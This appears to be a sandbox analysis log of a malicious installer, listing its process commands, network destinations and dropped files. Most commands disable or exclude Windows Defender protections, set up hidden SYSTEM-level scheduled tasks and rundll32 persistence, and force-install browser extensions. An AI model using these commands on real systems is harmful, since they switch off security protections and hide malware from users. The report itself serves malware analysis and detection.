"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gtgjXOQTh" /SC once /ST 01:14:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gtgjXOQTh"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gtgjXOQTh"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 01:38:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe\" UK /xEsite_idZwP 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe UK /xEsite_idZwP 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\YibzXz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\LRNvgVr.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\tWWCHdy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\oujrFQM.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ftzROSO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\txXOAHH.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 02:03:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll\",#1 /mSsite_idmty 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll",#1 /mSsite_idmty 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll",#1 /mSsite_idmty 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 52.111.243.29:443 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 161.111.86.104.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 200.110.86.104.in-addr.arpa udp
NL 172.217.168.238:443 clients2.google.com tcp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
NL 172.217.168.238:443 clients2.google.com tcp
US 44.240.147.44:80 api2.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpxk20g3.uz5.ps1

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\system32\GroupPolicy\gpt.ini

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

C:\Program Files (x86)\yvWovCiVU\LRNvgVr.xml

C:\Program Files (x86)\LCifMpYymZWU2\tWWCHdy.xml

C:\ProgramData\WkkDuRgYrrqHXcVB\oujrFQM.xml

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ftzROSO.xml

C:\Program Files (x86)\mVqQIGUXDOgrC\txXOAHH.xml

C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\obahtjhr.default-release\prefs.js

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
